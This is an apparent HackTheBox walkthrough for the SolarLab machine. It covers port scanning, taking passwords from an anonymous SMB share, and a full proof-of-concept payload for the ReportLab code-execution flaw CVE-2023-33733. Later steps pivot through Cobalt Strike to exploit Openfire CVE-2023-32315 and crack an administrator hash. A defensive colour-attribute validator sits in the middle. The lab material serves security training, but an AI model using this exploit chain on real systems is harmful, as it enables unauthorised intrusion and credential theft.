SolarLab HTB Writeup | HacktheBox

In this walkthrough, I demonstrate how I obtained complete ownership of SolarLab on HackTheBox.

Let's Solve SolarLab HTB Writeup

SolarLab is a notable challenge within the HacktheBox community, demanding a comprehensive understanding of cybersecurity and penetration testing. By immersing ourselves in this hands-on experience, we gain invaluable insights into the real-world scenarios faced by ethical hackers in securing digital environments.

HTB SolarLab link: https://app.hackthebox.com/machines/SolarLab

Intelligence

Scan ports:

PORT     STATE SERVICE       VERSION
80/tcp   open  http          nginx 1.24.0
|_http-server-header: nginx/1.24.0
|_http-title: Did not follow redirect to <http://solarlab.htb/>
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds?
6791/tcp open  http          nginx 1.24.0
|_http-server-header: nginx/1.24.0
|_http-title: Did not follow redirect to <http://report.solarlab.htb:6791/>
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: -21s
| smb2-time:
|   date: 2024-05-13T16:13:30
|_  start_date: N/A
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled but not required

Add the domains to /etc/hosts:

echo "10.10.11.16 solarlab.htb" | sudo tee -a /etc/hosts

echo "10.10.11.16 report.solarlab.htb" | sudo tee -a /etc/hosts

We reach the site:

User flag

We connect over SMB as the anonymous user.

We download the spreadsheet containing passwords.

We log in as the user Blakeb and land here:

We find a PDF generator. Looking at the metadata of a generated file, we see that the document was produced with the ReportLab PDF Library.

Searching for known vulnerabilities, we come across CVE-2023-33733, a flaw in the ReportLab library's handling of untrusted input that allows an attacker to execute arbitrary code.

Read more here: https://github.com/c53elyas/CVE-2023-33733

PoC:

<para><font color="[[[getattr(pow, Word('__globals__'))['os'].system('Здесь мог бы быть ваш payload') for Word in [ orgTypeFun( 'Word', (str,), { 'mutated': 1, 'startswith': lambda self, x: 1 == 0, '__eq__': lambda self, x: self.mutate() and self.mutated < 0 and str(self) == x, 'mutate': lambda self: { setattr(self, 'mutated', self.mutated - 1) }, '__hash__': lambda self: hash(str(self)), }, ) ] ] for orgTypeFun in [type(type(1))] for none in [[].append(1)]]] and 'red'">
                exploit
</font></para>
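As an added example (not code from this writeup or from ReportLab): a defensive allow-list for the colour attribute values that end up in ReportLab paragraph markup. ReportLab's toColor() falls back to evaluating a colour string it cannot parse through rl_safe_eval, which is the path the PoC above abuses; rejecting anything that is not a named colour or a hex triplet closes that path before the library is called. The named-colour subset and the sample fragments are constructed.

```python
import html
import re

# Constructed subset of ReportLab's named colours; extend as needed.
NAMED_COLORS = {"black", "white", "red", "green", "blue", "yellow", "grey", "gray"}
# #RGB, #RRGGBB or #RRGGBBAA and nothing else.
HEX_COLOR = re.compile(r"^#(?:[0-9a-fA-F]{3}|[0-9a-fA-F]{6}|[0-9a-fA-F]{8})$")
# Colour-bearing attributes inside <para>/<font> markup.
COLOR_ATTR = re.compile(r'\b(?:color|backcolor|bgcolor)\s*=\s*"([^"]*)"', re.IGNORECASE)


def is_safe_color(value: str) -> bool:
    """True only for a named colour or a hex triplet. Brackets, calls and
    attribute access (the shape of the PoC) never reach rl_safe_eval."""
    v = value.strip()
    return v.lower() in NAMED_COLORS or bool(HEX_COLOR.match(v))


def unsafe_color_attrs(markup: str) -> list:
    """Return every colour attribute value in a markup fragment that fails the
    allow-list. Usable as a pre-render gate or as a scanner over request logs."""
    return [m.group(1) for m in COLOR_ATTR.finditer(markup) if not is_safe_color(m.group(1))]


def safe_para(user_text: str, color: str = "black") -> str:
    """Build a <para> where user text is escaped (so it cannot open a tag) and
    the colour is validated; refuses to render instead of passing a bad value."""
    if not is_safe_color(color):
        raise ValueError("rejected colour attribute: %r" % color)
    return '<para><font color="%s">%s</font></para>' % (color, html.escape(user_text, quote=True))


if __name__ == "__main__":
    # Constructed inputs: a benign fragment and one carrying a Python expression
    # in the colour attribute, the same shape as the CVE-2023-33733 PoC.
    benign = '<para><font color="#ff0000">quarterly report</font></para>'
    suspicious = '<para><font color="[[[1 for x in [1]]] and \'red\'">exploit</font></para>'
    print(unsafe_color_attrs(benign))      # []
    print(unsafe_color_attrs(suspicious))  # ["[[[1 for x in [1]]] and 'red'"]
    print(safe_para("<b>name</b>", "red"))
```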

We intercept the request in Burp Suite and insert the payload.

We get a shell and read the user flag.

Root flag

We view the open ports.

We launch Cobalt Strike and start a SOCKS4 proxy on port 57378. As an alternative to Cobalt Strike, port forwarding with Chisel can be used: https://github.com/Pokefenn/Chisel

We check the connection through proxychains.

Through FoxyProxy we reach the local web service on port 9090.

We are greeted by the Openfire login form.

We start msfconsole, routing all traffic through the compromised machine.

We use the exploit for CVE-2023-32315. It creates a new account for us and returns a shell.

We go to the database file directory

and find the Openfire database.

We extract the administrator's hash

and decrypt it with OpenFireDecryptPass.

We upload RunasCs.exe to the target machine. It lets us start a process as the administrator (if the password is known) with full privileges.

Having previously uploaded Shell.exe to the user's desktop, we run the exe and catch the callback in Cobalt Strike.

We read the root flag.

FAQ

What is the SolarLab challenge on HacktheBox?

The SolarLab challenge on HacktheBox is a simulated cybersecurity challenge that tests participants’ hacking skills and knowledge. It presents a realistic scenario in which players must navigate through a virtual environment, identifying vulnerabilities, exploiting them, and escalating privileges to complete the challenge objectives.

What skills are required to tackle the SolarLab challenge?

Tackling the SolarLab challenge requires proficiency in various areas, including network reconnaissance, vulnerability scanning, exploit development, privilege escalation, and post-exploitation techniques. Participants must have a solid understanding of penetration testing methodologies, common hacking tools, and techniques to successfully navigate the challenge.

What is the initial reconnaissance phase in the SolarLab challenge?

The initial reconnaissance phase in the SolarLab challenge involves gathering information about the target network and infrastructure. Hackers leverage various methods and tools like port scanning, banner grabbing, and enumeration to identify potential entry points and understand the layout and technologies used in the SolarLab environment.

How is scanning and enumeration performed in the SolarLab challenge?

Scanning and enumeration in the SolarLab challenge involve using tools such as Nmap and enumeration scripts to identify open ports, services, and potential vulnerabilities. This phase helps hackers gather valuable information about the target system, including running services, software versions, and misconfigurations that may lead to exploitable vulnerabilities.

What is the process of exploiting vulnerabilities in the SolarLab challenge?

Exploiting vulnerabilities in the SolarLab challenge involves identifying and leveraging weaknesses within the target system or applications. Hackers may utilize exploit frameworks, custom scripts, or manual exploitation techniques to exploit vulnerabilities, gain unauthorized access, and achieve the desired objectives of the challenge.

How do you escalate privileges in the SolarLab challenge?

Privilege escalation in the SolarLab challenge involves elevating user privileges to gain access to restricted files, directories, or systems. Hackers make use of various techniques like exploiting misconfigurations, leveraging kernel vulnerabilities, and abusing weak access controls to escalate privileges within the target environment.

What is the post-exploitation phase in the SolarLab challenge?

The post-exploitation phase in the SolarLab challenge focuses on maintaining access, exfiltrating data, and exploring the compromised system. Hackers may set up backdoors, establish persistence mechanisms, perform lateral movement to other systems, or extract sensitive information to achieve the intended goals of the challenge.

How important is analysis and reporting in the SolarLab challenge?

Analysis and reporting play a crucial role in the SolarLab challenge as they enable hackers to document their findings, actions, and techniques used throughout the challenge. Proper analysis helps identify areas of improvement, while comprehensive reporting showcases the skills and knowledge gained during the hands-on experience, enhancing the ethical hacking and penetration testing capabilities of participants.

What can be learned from completing the SolarLab challenge?

Completing the SolarLab challenge provides valuable hands-on experience in various aspects of ethical hacking and penetration testing. Participants gain insights into real-world hacking scenarios, improve their technical skills, enhance their problem-solving abilities, and develop a deep understanding of secure system configurations and vulnerabilities that can be used to improve cybersecurity practices.
